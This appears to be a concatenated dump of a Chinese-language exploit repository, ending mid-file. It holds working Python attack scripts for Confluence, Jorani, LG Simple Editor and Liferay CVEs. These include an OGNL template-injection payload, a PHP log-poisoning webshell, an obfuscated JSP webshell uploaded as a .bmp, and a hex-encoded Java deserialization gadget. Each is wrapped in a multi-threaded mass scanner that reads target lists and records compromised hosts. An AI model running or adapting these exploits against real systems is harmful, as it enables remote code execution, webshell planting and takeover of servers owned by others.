 13 |     VULNERABLE_VERSIONS = ['8.0.0', '8.0.1', '8.0.2', '8.0.3', '8.0.4', '8.1.0', '8.1.1', '8.1.3', '8.1.4', '8.2.0', '8.2.1', '8.2.2', '8.2.3', '8.3.0', '8.3.1', '8.3.2', '8.4.0', '8.4.1', '8.4.2', '8.5.0', '8.5.1']
 14 | 
 15 |     headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36'}
 16 | 
 17 |     try:
 18 |         response = requests.get(url, headers=headers, verify=False, timeout=5)
 19 |         response.raise_for_status()
 20 |     except RequestException as err:
 21 |         print(f"连接到 {url} 时出现错误: {err}")
 22 |         return
 23 | 
 24 |     if 'Atlassian Confluence' not in response.text:
 25 |         print(f"{url} - 目标似乎不是 Atlassian Confluence. 跳过此目标.")
 26 |         return
 27 | 
 28 |     version_match = re.search(r'Atlassian Confluence ([\d\.]+)<', response.text)
 29 |     if not version_match:
 30 |         version_match = re.search(r'"ajs-version-number" content="([\d\.]+)"', response.text)
 31 | 
 32 |     if version_match:
 33 |         version = version_match.group(1)
 34 |         product = 'Atlassian Confluence'
 35 |     else:
 36 |         version = 'unknown'
 37 |         product = 'unknown'
 38 | 
 39 |     initial_vuln_status = 'not vulnerable'
 40 | 
 41 |     if version != 'unknown' and version in VULNERABLE_VERSIONS:
 42 |         initial_vuln_status = "potentially vulnerable"
 43 |     # 如果目标状态为 "not vulnerable"，则不保存到结果中
 44 |     if initial_vuln_status == 'not vulnerable':
 45 |         return
 46 | 
 47 |     target_info = {
 48 |         'target_url': url,
 49 |         'product': product,
 50 |         'version': version,
 51 |         'vulnerability_status': initial_vuln_status,
 52 |     }
 53 | 
 54 |     try:
 55 |         server_info_url = f"{url}{SERVER_INFO_URI}"
 56 |         response = requests.get(server_info_url, headers=headers, verify=False, allow_redirects=False, timeout=5)
 57 |         response.raise_for_status()
 58 |     except RequestException as err:
 59 |         print(f"{url} - 连接到 {server_info_url} 时出现错误: {err}")
 60 |         return
 61 | 
 62 |     if response.status_code != 200:
 63 |         print(f"{url} - 无法访问脆弱的端点 {SERVER_INFO_URI}，收到状态码 {response.status_code}。目标可能已打补丁.")
 64 |         if initial_vuln_status == 'potentially vulnerable':
 65 |             target_info['vulnerability_status'] = 'likely not exploitable'
 66 | 
 67 |     with open(success_file, 'a') as s_file:
 68 |         s_file.write("++++++++++++++++++\n")
 69 |         s_file.write(f"目标URL: {url}\n")
 70 |         s_file.write(f"产品: {product}\n")
 71 |         s_file.write(f"版本号: {version}\n")
 72 |         s_file.write(f"漏洞状态: {initial_vuln_status}\n\n")
 73 | 
 74 | def scan_targets(targets, proxies={}, success_file=None):
 75 |     for target in targets:
 76 |         target = target.strip()
 77 |         check_for_vulnerability(target, proxies, success_file)
 78 | 
 79 | if __name__ == '__main__':
 80 |     parser = argparse.ArgumentParser(description="Confluence 权限提升漏洞CVE-2023-22515")
 81 |     parser.add_argument("-u", "--url", help="目标URL")
 82 |     parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
 83 |     args = parser.parse_args()
 84 | 
 85 |     if not args.url and not args.file:
 86 |         print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
 87 |         exit(1)
 88 | 
 89 |     if args.url:
 90 |         urls = [args.url]
 91 |     elif args.file:
 92 |         with open(args.file, 'r') as file:
 93 |             urls = file.readlines()
 94 | 
 95 |     proxies = {}
 96 |     success_file = 'success_targets.txt'
 97 | 
 98 |     for url in urls:
 99 |         url = url.strip()
100 |         if not url.startswith("http://") and not url.startswith("https://"):
101 |             scan_targets(["http://" + url, "https://" + url], proxies, success_file)
102 |         else:
103 |             scan_targets([url], proxies, success_file)
104 | 
105 |     print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
106 | 


--------------------------------------------------------------------------------
/Confluence_CVE-2023-22517_Exploit.py:
--------------------------------------------------------------------------------
 1 | # 作者: VulnExpo
 2 | # 日期: 2024-01-22
 3 | 
 4 | import requests
 5 | import argparse
 6 | import threading
 7 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 8 | 
 9 | def check_for_vulnerability(url, proxies=None, success_file=None):
10 | 	headers = {
11 | 			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
12 | 			"Content-type": "application/x-www-form-urlencoded"
13 | 	}
14 | 
15 | 	payload = "name=aaxxxa&list=ccc&list=ddd&list=ddd&list=ddd&list=ddd&listKey=11&size=1&multiple=1&label=111\\u0027%2b#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.poc[0],{})%2b\\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({'id'}))"
16 | 
17 | 	try:
18 | 		response = requests.post(url + '/template/aui/text-inline.vm', headers=headers, data=payload, proxies=proxies, verify=False)
19 | 
20 | 		if response.status_code == 200 and 'X-Cmd-Response' in response.headers:
21 | 			with open(success_file, 'a') as s_file:
22 | 				x_cmd_response = response.headers.get('X-Cmd-Response', 'N/A')
23 | 				s_file.write(f"++++++++++++++++++\n")
24 | 				s_file.write(f"目标URL: {url}\n")
25 | 				s_file.write(f"响应内容:\n{x_cmd_response}\n\n")
26 | 			return True
27 | 	except Exception as e:
28 | 		print(f"发生异常：{e}")
29 | 
30 | 	return False
31 | 
32 | def scan_targets(targets, proxies=None, success_file=None):
33 | 	for target in targets:
34 | 		target = target.strip()
35 | 		check_for_vulnerability(target, proxies, success_file)
36 | 
37 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
38 | 	threads = []
39 | 
40 | 	for i in range(num_threads):
41 | 		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
42 | 		threads.append(thread)
43 | 
44 | 	for thread in threads:
45 | 		thread.start()
46 | 
47 | 	for thread in threads:
48 | 		thread.join()
49 | 
50 | if __name__ == '__main__':
51 | 	parser = argparse.ArgumentParser(description="Atlassian Confluence 模板注入代码执行漏洞CVE-2023-22527")
52 | 	parser.add_argument("-u", "--url", help="目标URL")
53 | 	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
54 | 	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
55 | 	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
56 | 	args = parser.parse_args()
57 | 
58 | 	if not args.url and not args.file:
59 | 		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
60 | 		exit(1)
61 | 
62 | 	if args.url:
63 | 		urls = [args.url]
64 | 	elif args.file:
65 | 		with open(args.file, 'r') as file:
66 | 			urls = file.readlines()
67 | 
68 | 	success_file = 'success_targets.txt'
69 | 
70 | 	proxies = {
71 | 		"http": args.proxy,
72 | 		"https": args.proxy
73 | 	} if args.proxy else None
74 | 
75 | 	multi_threaded_scan(urls, proxies, success_file, args.threads)
76 | 
77 | 	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
78 | 


--------------------------------------------------------------------------------
/Jorani_CVE-2023-26469_exp.py:
--------------------------------------------------------------------------------
  1 | # 作者: VulnExpo
  2 | # 日期: 2023-11-13
  3 | 
  4 | import argparse
  5 | import threading
  6 | import requests
  7 | import datetime
  8 | import re
  9 | import base64
 10 | import random
 11 | import string
 12 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 13 | 
 14 | def check_for_vulnerability(url, proxies=None, success_file=None):
 15 | 	try:
 16 | 		# 正则表达式模式
 17 | 		CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"')
 18 | 		CMD_PATTERN = re.compile('---------(.*?)---------', re.S)
 19 | 
 20 | 		# 定义目标 URL 路径
 21 | 		URLS = {
 22 | 			'login': '/session/login',
 23 | 			'view': '/pages/view/',
 24 | 		}
 25 | 
 26 | 		# 生成随机的请求头名称
 27 | 		def generate_random_header_name():
 28 | 			alphabet = string.ascii_uppercase
 29 | 			return ''.join(random.choice(alphabet) for i in range(12))
 30 | 
 31 | 		HEADER_NAME = generate_random_header_name()
 32 | 
 33 | 		# 恶意负载
 34 | 		POISON_PAYLOAD = "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>"
 35 | 		PATH_TRAV_PAYLOAD = "../../application/logs"
 36 | 		command = "id"
 37 | 
 38 | 		# 创建会话并获取会话 cookie
 39 | 		session = requests.Session()
 40 | 		# print("Requesting session cookie")
 41 | 		response = session.get(url + URLS['login'], verify=False)
 42 | 		cookies = session.cookies.get_dict()
 43 | 
 44 | 		# 提取 CSRF 令牌
 45 | 		csrf_token = re.findall(CSRF_PATTERN, response.text)[0]
 46 | 		# print(f"Poisoning log file with payload: '{POISON_PAYLOAD}'")
 47 | 		# print(f"Setting path traversal to '{PATH_TRAV_PAYLOAD}'")
 48 | 		# print(f"Recovered CSRF Token: {csrf_token}")
 49 | 
 50 | 		# 向服务器发送恶意请求以污染日志文件
 51 | 		data = {
 52 | 			"csrf_test_jorani": csrf_token,
 53 | 			"last_page": "session/login",
 54 | 			"language": PATH_TRAV_PAYLOAD,
 55 | 			"login": POISON_PAYLOAD,
 56 | 			"CipheredValue": "DummyPassword"
 57 | 		}
 58 | 		session.post(url + URLS['login'], data=data)
 59 | 
 60 | 		log_file_name = f"log-{datetime.date.today().isoformat()}"
 61 | 
 62 | 		# 设置特殊请求头以执行操作系统命令
 63 | 		BypassRedirect = {
 64 | 			'X-REQUESTED-WITH': 'XMLHttpRequest',
 65 | 			HEADER_NAME: base64.b64encode(f"echo ---------;{command} 2>&1;echo ---------;".encode()).decode()
 66 | 		}
 67 | 		response = session.get(url + URLS['view'] + log_file_name, headers=BypassRedirect)
 68 | 		command_output = re.findall(CMD_PATTERN, response.text)
 69 | 		try:
 70 | 			print(f"目标 {url} 响应内容 {command_output[0].strip()}")
 71 | 			with open(success_file, 'a') as s_file:
 72 | 				s_file.write(f"++++++++++++++++++\n")
 73 | 				s_file.write(f"目标URL: {url}\n")
 74 | 				s_file.write(f"响应内容: {command_output[0].strip()}\n\n")
 75 | 		except Exception as e:
 76 | 			print(f"目标 {url} 发生异常：{e}")
 77 | 			return False
 78 | 	except Exception as e:
 79 | 		print(f"目标 {url} 发生异常：{e}")
 80 | 
 81 | def scan_targets(targets, proxies=None, success_file=None):
 82 | 	for target in targets:
 83 | 		target = target.strip()
 84 | 		check_for_vulnerability(target, proxies, success_file)
 85 | 
 86 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
 87 | 	threads = []
 88 | 
 89 | 	for i in range(num_threads):
 90 | 		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
 91 | 		threads.append(thread)
 92 | 
 93 | 	for thread in threads:
 94 | 		thread.start()
 95 | 
 96 | 	for thread in threads:
 97 | 		thread.join()
 98 | 
 99 | if __name__ == '__main__':
100 | 	parser = argparse.ArgumentParser(description="Jorani远程命令执行漏洞CVE-2023-26469")
101 | 	parser.add_argument("-u", "--url", help="目标URL")
102 | 	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
103 | 	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
104 | 	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
105 | 	args = parser.parse_args()
106 | 
107 | 	if not args.url and not args.file:
108 | 		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
109 | 		exit(1)
110 | 
111 | 	if args.url:
112 | 		urls = [args.url]
113 | 	elif args.file:
114 | 		with open(args.file, 'r') as file:
115 | 			urls = file.readlines()
116 | 
117 | 	success_file = 'success_targets.txt'
118 | 
119 | 	proxies = {
120 | 		"http": args.proxy,
121 | 		"https": args.proxy
122 | 	} if args.proxy else None
123 | 
124 | 	multi_threaded_scan(urls, proxies, success_file, args.threads)
125 | 
126 | 	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
127 | 


--------------------------------------------------------------------------------
/LGSimpleEdiotr_CVE-2023-40498_exploit.py:
--------------------------------------------------------------------------------
  1 | # 作者: VulnExpo
  2 | # 日期: 2023-11-17
  3 | 
  4 | import requests
  5 | import argparse
  6 | import threading
  7 | import string
  8 | import random
  9 | from urllib3.exceptions import InsecureRequestWarning
 10 | 
 11 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 12 | 
 13 | 
 14 | def generate_random_string(length=5):
 15 |     letters = string.ascii_lowercase
 16 |     return ''.join(random.choice(letters) for _ in range(length))
 17 | 
 18 | 
 19 | def check_for_vulnerability(url, proxies=None, success_file=None):
 20 |     try:
 21 |         random_string = generate_random_string()
 22 | 
 23 |         path1 = "/simpleeditor/imageManager/uploadImage.do"
 24 |         headers1 = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0',
 25 |                     'Content-Type': 'multipart/form-data; boundary=---------------------------819989449787154297538622041045'}
 26 |         data1 = """-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile\"; filename=\"{file_name}.bmp\"\r\nContent-Type: image/bmp\r\nContent-Transfer-Encoding: binary\r\n\r\n<%@ page import="java.util.Scanner" pageEncoding="UTF-8" %>
 27 | <HTML><title>Just For Fun</title>
 28 | <BODY><H3>Build By LandGrey</H3>
 29 | <FORM METHOD=POST ACTION='#'>    <INPUT name='q' type=text>
 30 |     <INPUT type=submit value='Fly'>
 31 | </FORM><%!
 32 |     public static String getPicture(String str) throws Exception{{
 33 |         String fileSeparator =String.valueOf(java.io.File.separatorChar);
 34 |         if(fileSeparator.equals("\\\\")){{
 35 |             str = new String(new byte[] {{99, 109, 100, 46, 101, 120, 101, 32, 47, 67, 32}}) + str;
 36 |         }}else{{
 37 |             str =  new String(new byte[] {{47, 98, 105, 110, 47, 98, 97, 115, 104, 32, 45, 99, 32}}) + str;
 38 |         }}        Class rt = Class.forName(new String(new byte[] {{ 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }}));
 39 |         Process e = (Process) rt.getMethod(new String(new byte[] {{ 101, 120, 101, 99 }}), String.class).invoke(rt.getMethod(new String(new byte[] {{ 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 }})).invoke(null, new Object[]{{}}),  new Object[] {{ str }});        Scanner sc = new Scanner(e.getInputStream()).useDelimiter("\\\\A");
 40 |         String result = "";        result = sc.hasNext() ? sc.next() : result;
 41 |         sc.close();        return result;    }}%><%    String name ="Input Nothing";    String query = request.getParameter("q");    if(query != null) {{        name = getPicture(query);    }}%><pre><%= name %></pre></BODY></HTML>\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadPath\"\r\n\r\n/\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_x\"\r\n\r\n-1000\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_y\"\r\n\r\n-1000\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_width\"\r\n\r\n1920\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_height\"\r\n\r\n1080\r\n-----------------------------819989449787154297538622041045--""";
 42 |         data1 = data1.format(file_name=random_string)
 43 |         response1 = requests.post(url + path1, data=data1, headers=headers1, verify=False)
 44 | 
 45 |         if response1.status_code == 200:
 46 |             path2 = "/simpleeditor/fileSystem/makeDetailContent.do"
 47 |             data2 = {
 48 |                 "command": "cp",
 49 |                 "option": "-f",
 50 |                 "srcPath": f"/{random_string}_original.bmp",
 51 |                 "destPath": f"/{random_string}.jsp"
 52 |             }
 53 |             headers2 = {
 54 |                 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47',
 55 |                 'X-Requested-With': 'XMLHttpRequest',
 56 |                 'Accept': 'application/json',
 57 |                 'Content-Type': 'application/json'
 58 |             }
 59 | 
 60 |             response2 = requests.post(url + path2, json=data2, headers=headers2, verify=False)
 61 | 
 62 |             if response2.status_code == 200 and "errorMessage" in response2.json() and response2.json()[
 63 |                 "errorMessage"] == "success":
 64 |                 print(f"目标URL: {url}")
 65 |                 print(f"响应内容: {url}/simpleeditor/{random_string}.jsp#")
 66 |                 with open(success_file, 'a') as s_file:
 67 |                     s_file.write(f"++++++++++++++++++\n")
 68 |                     s_file.write(f"目标URL: {url}\n")
 69 |                     s_file.write(f"响应内容: {url}/simpleeditor/{random_string}.jsp#\n\n")
 70 |                 return True
 71 |             else:
 72 |                 print("第二个请求失败")
 73 |                 return False
 74 | 
 75 |         else:
 76 |             print("第一个请求失败")
 77 |             return False
 78 | 
 79 |     except Exception as e:
 80 |         print(f"发生异常：{e}")
 81 |         return False
 82 | 
 83 | 
 84 | def scan_targets(targets, proxies=None, success_file=None):
 85 |     for target in targets:
 86 |         target = target.strip()
 87 |         check_for_vulnerability(target, proxies, success_file)
 88 | 
 89 | 
 90 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
 91 |     threads = []
 92 | 
 93 |     for i in range(num_threads):
 94 |         thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
 95 |         threads.append(thread)
 96 | 
 97 |     for thread in threads:
 98 |         thread.start()
 99 | 
100 |     for thread in threads:
101 |         thread.join()
102 | 
103 | 
104 | if __name__ == '__main__':
105 |     parser = argparse.ArgumentParser(description="LG Simple Editor 远程代码执行CVE-2023-40498")
106 |     parser.add_argument("-u", "--url", help="目标URL")
107 |     parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
108 |     parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
109 |     parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
110 |     args = parser.parse_args()
111 | 
112 |     if not args.url and not args.file:
113 |         print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
114 |         exit(1)
115 | 
116 |     if args.url:
117 |         urls = [args.url]
118 |     elif args.file:
119 |         with open(args.file, 'r') as file:
120 |             urls = file.readlines()
121 | 
122 |     success_file = 'success_targets.txt'
123 | 
124 |     proxies = {
125 |         "http": args.proxy,
126 |         "https": args.proxy
127 |     } if args.proxy else None
128 | 
129 |     multi_threaded_scan(urls, proxies, success_file, args.threads)
130 | 
131 |     print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
132 | 


--------------------------------------------------------------------------------
/Liferay_CVE-2020-7961_Exploit.py:
--------------------------------------------------------------------------------
 1 | # 作者: VulnExpo
 2 | # 日期: 2023-10-7
 3 | 
 4 | import sys
 5 | import requests
 6 | import time
 7 | import json
 8 | import re
 9 | from urllib.parse import urlparse
10 | import random
11 | import argparse
12 | 
13 | requests.packages.urllib3.disable_warnings()
14 | 
15 | def check_for_vulnerability(url, proxies={}, success_file=None):
16 | 
17 |     try:
18 |         cmd = 'whoami'
19 |         payload = 'ACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000001103CAFEBABE0000003100DD0A0036006C0A006D006E0A006F00700700710800720A007300740A007500760A007500770700780800790A0009007A08007B07007C0A000D006C08007D0A007E007F0A008000810800820A008000830800840B0085008608008708008808008907008A0A0019008B0A0019008C0A0019008D07008E07008F0A009000910A001E00920A001D00930700940A0022006C0A001D00950A002200960800970700980A0027006C0800990A0027009A0A0022009B0A0027009B0A0009009C0A009D009E08009F0A008000A00A00A100A20A00A100A30700A40A003300A50700A60700A70100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004636D64730100104C6A6176612F7574696C2F4C6973743B01000769734C696E75780100015A0100056F735479700100124C6A6176612F6C616E672F537472696E673B01000E70726F636573734275696C64657201001A4C6A6176612F6C616E672F50726F636573734275696C6465723B01000470726F630100134C6A6176612F6C616E672F50726F636573733B01000262720100184C6A6176612F696F2F42756666657265645265616465723B01000273620100184C6A6176612F6C616E672F537472696E674275666665723B0100046C696E65010006726573756C74010008726573706F6E73650100284C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E73653B01000C6F757470757453747265616D0100234C6A617661782F736572766C65742F536572766C65744F757470757453747265616D3B01000E73657276696365436F6E746578740100324C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578743B0100037265710100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B0100097265715F6669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000B63757272656E745F7265710100274C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526571756573743B010003636D6401000265780100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100124C7061796C6F61642F63625F74656D706C3B0100164C6F63616C5661726961626C65547970655461626C650100244C6A6176612F7574696C2F4C6973743C4C6A6176612F6C616E672F537472696E673B3E3B01000A457863657074696F6E730100097472616E73666F726D0100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B0100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000D63625F74656D706C2E6A6176610C003700380700A80C00A900AA0700AB0C00AC00AD01002B6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F52657175657374466163616465010007726571756573740700AE0C00AF00B00700B10C00B200B30C00B400B50100256F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526571756573740100026A6B0C00B600B70100000100136A6176612F7574696C2F41727261794C6973740100076F732E6E616D650700B80C00B900B70700BA0C00BB00BC01000377696E0C00BD00BE010007636D642E6578650700BF0C00C000C10100022F630100092F62696E2F626173680100022D630100186A6176612F6C616E672F50726F636573734275696C6465720C003700C20C00C300C40C00C500C60100166A6176612F696F2F42756666657265645265616465720100196A6176612F696F2F496E70757453747265616D5265616465720700C70C00C800C90C003700CA0C003700CB0100166A6176612F6C616E672F537472696E674275666665720C00CC00BC0C00CD00CE0100010A0100176A6176612F6C616E672F537472696E674275696C6465720100037E7E7E0C00CD00CF0C00D000BC0C00D100D20700D30C00D400D50100057574662D380C00D600D70700D80C00D900DA0C00DB00380100136A6176612F6C616E672F457863657074696F6E0C00DC00380100107061796C6F61642F63625F74656D706C010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C657401003B636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578745468726561644C6F63616C01001167657453657276696365436F6E7465787401003428294C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578743B010030636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E7465787401000A6765745265717565737401002928294C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B01000F6A6176612F6C616E672F436C6173730100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C6401000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0100106A6176612F6C616E672F53797374656D01000B67657450726F70657274790100106A6176612F6C616E672F537472696E6701000B746F4C6F7765724361736501001428294C6A6176612F6C616E672F537472696E673B010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A01000E6A6176612F7574696C2F4C697374010003616464010015284C6A6176612F6C616E672F4F626A6563743B295A010013284C6A6176612F7574696C2F4C6973743B295601001372656469726563744572726F7253747265616D01001D285A294C6A6176612F6C616E672F50726F636573734275696C6465723B010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B010018284C6A6176612F696F2F496E70757453747265616D3B2956010013284C6A6176612F696F2F5265616465723B2956010008726561644C696E65010006617070656E6401002C284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E674275666665723B01002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E674275696C6465723B010008746F537472696E6701000B676574526573706F6E736501002A28294C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E73653B0100266F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E736501000F6765744F757470757453747265616D01002528294C6A617661782F736572766C65742F536572766C65744F757470757453747265616D3B0100086765744279746573010016284C6A6176612F6C616E672F537472696E673B295B420100216A617661782F736572766C65742F536572766C65744F757470757453747265616D0100057772697465010005285B422956010005636C6F736501000F7072696E74537461636B547261636500210035003600000000000300010037003800020039000002B7000500110000013D2AB70001B800024C2BB600034D12041205B600064E2D04B600072D2CB60008C000093A041904120AB6000B3A051905C601051905120CA500FEBB000D59B7000E3A06043607120FB800103A081908C600131908B600111212B6001399000603360715079A002419061214B9001502005719061216B9001502005719061905B90015020057A7002119061217B9001502005719061218B9001502005719061905B90015020057BB0019591906B7001A3A09190904B6001B571909B6001C3A0ABB001D59BB001E59190AB6001FB70020B700213A0BBB002259B700233A0C190BB60024593A0DC60013190C190DB600251226B6002557A7FFE8BB002759B700281229B6002A190CB6002BB6002A1229B6002AB6002C3A0E1904B6002D3A0F190FB6002E3A101910190E122FB60030B600311910B60032A700084C2BB60034B1000100040134013700330003003A0000009200240000001A0004001C0008001D000D001E0015001F001A002000240022002D0023003900240042002500450026004C0027005E00280061002A0066002B0070002C007A002D0087002F00910030009B003100A5003400B0003500B7003600BE003800D3003900DC003C00E7003D00F7004001150041011C004201230043012F00440134004A0137004801380049013C004B003B000000B60012004200F2003C003D0006004500EF003E003F0007004C00E800400041000800B0008400420043000900BE007600440045000A00D3006100460047000B00DC005800480049000C00E40050004A0041000D0115001F004B0041000E011C0018004C004D000F01230011004E004F00100008012C005000510001000D01270052005300020015011F00540055000300240110005600570004002D0107005800410005013800040059005A00010000013D005B005C0000005D0000000C0001004200F2003C005E0006005F000000040001003300010060006100010039000000490000000400000001B100000002003A0000000600010000004E003B0000002A000400000001005B005C0000000000010062006300010000000100640065000200000001006600670003000100600068000100390000003F0000000300000001B100000002003A00000006000100000051003B00000020000300000001005B005C000000000001006200630001000000010066006900020001006A00000002006B70740006747231706C65707701007871007E000D78'
20 |         post_data=(
21 |             'cmd={"/expandocolumn/update-column":{}}&p_auth=test&formDate=2020&columnId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:'+payload+';"}'
22 |         )
23 |         headers = {
24 |             'Content-Type': 'application/x-www-form-urlencoded',
25 |             "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
26 |             "jk": cmd
27 |         }
28 |         api_url = '{url}/api/jsonws/invoke'.format(url=url)
29 |         resp = requests.post(url=api_url, data=post_data, headers=headers, timeout=60, verify=False, allow_redirects=False)
30 |         pattern = '~~~(.*?)~~~'
